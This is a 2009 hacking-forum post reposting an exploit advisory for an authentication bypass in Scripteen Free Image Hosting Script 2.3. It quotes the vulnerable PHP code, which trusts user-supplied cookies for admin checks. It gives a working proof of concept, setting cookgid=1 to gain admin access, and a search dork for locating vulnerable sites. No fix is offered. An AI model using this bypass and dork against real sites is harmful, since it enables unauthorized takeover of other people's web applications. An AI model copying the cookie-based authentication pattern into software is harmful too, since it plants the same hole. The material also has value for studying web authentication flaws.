Multi Ethnic Hacking Group


    Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln

    Share

    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln

    Post by Foxi on Sat Jul 25, 2009 11:45 am

    Code:
                                                ||          ||  | ||
                                        o_,_7 _||  . _o_7 _|| q_|_||  o_\\\_,
                                        (  :  /    (_)    /          (      .

                                                ___________________
                                              _/QQQQQQQQQQQQQQQQQQQ\__
                                            __/QQQ/````````````````\QQQ\___
                                          _/QQQQQ/                  \QQQQQQ\
                                        /QQQQ/``                    ```QQQQ\
                                        /QQQQ/                          \QQQQ\
                                      |QQQQ/    By  Qabandi            \QQQQ|
                                      |QQQQ|                            |QQQQ|
                                      |QQQQ|    From Kuwait, PEACE...  |QQQQ|
                                      |QQQQ|                            |QQQQ|
                                      |QQQQ\      iqa[a]hotmail.fr    /QQQQ|
                                        \QQQQ\                      __  /QQQQ/
                                        \QQQQ\                    /QQ\_QQQQ/
                                          \QQQQ\                  \QQQQQQQ/
                                          \QQQQQ\                /QQQQQ/_
                                            ``\QQQQQ\_____________/QQQ/\QQQQ\_
                                              ``\QQQQQQQQQQQQQQQQQQQ/  `\QQQQ\
                                                  ```````````````````    `````

    =Vuln:      Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
    =INFO:      http://www.scripteen.com/
    =BUY:        ---
    =Download:      http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
    =DORK:      DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"

                                      ____________
                                  _-=/:Conditions:\=-_
    ````````````````````````````````````````````````````````````````````````````````

    none

    ---------------------------------------===--------------------------------------

                                    _________________
                                _-=/:Vulnerable_Code:\=-_
    ````````````````````````````````````````````````````````````````````````````````
    // in ".\admin\header.php"

    $userid=$_SESSION['userid'];
    $usergid=$_SESSION['usergid'];
    if (!$userid || empty($userid) || $userid==""){
       $userid = $_COOKIE['cookid'];
       $usergid = $_COOKIE['cookgid'];
    }

    // this is the scripts authentication code, pasted in all admin files.. fail.

    if($usergid!="1")
    {
       header("Location: logout.php");   exit;
    }
    ---------------------------------------===--------------------------------------

                                        _______
                                    _-=/:P.o.C:\=-_
    ````````````````````````````````````````````````````````````````````````````````
    Set:

    Cookie: cookgid=1

    ---------------------------------------===--------------------------------------

                                        __________
                                    _-=/:SOLUTION:\=-_
    ````````````````````````````````````````````````````````````````````````````````
    nah

    ---------------------------------------===--------------------------------------
     ______________________________________________________________________________
    /                                                                              \
    |      ----------------------------------------------------------------------  |
    \______________________________________________________________________________/
                                    \ No More Private /
                                    `````````````````
                              Salamz to All Muslim Hackers.

    # milw0rm.com [2009-07-24]


      Current date/time is Fri Jan 20, 2017 11:48 am